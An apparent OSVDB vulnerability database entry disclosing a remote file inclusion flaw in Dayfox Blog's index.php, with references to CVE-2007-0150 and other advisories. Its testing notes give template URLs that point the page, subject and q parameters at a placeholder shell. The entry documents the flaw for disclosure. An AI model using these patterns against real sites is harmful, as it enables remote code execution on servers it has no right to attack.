Dayfox Blog index.php Multiple Variable Remote File Inclusion

2007-01-07T09:33:42
ID OSVDB:31259
Type osvdb
Reporter OSVDB
Modified 2007-01-07T09:33:42

Description

Manual Testing Notes

http://[target]/ScriptPath/index.php?page=[sheLL] http://[target]/ScriptPath/index.php?subject=[sheLL] http://[target]/ScriptPath/index.php?q=[sheLL]

References:

Vendor URL: http://hotscripts.com/Detailed/66344.html Vendor URL: http://dayfoxdesigns.co.nr/ Secunia Advisory ID:23661 Mail List Post: http://www.securityfocus.com/archive/1/archive/1/456212/100/0/threaded Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0190.html ISS X-Force ID: 31336 FrSIRT Advisory: ADV-2007-0099 CVE-2007-0150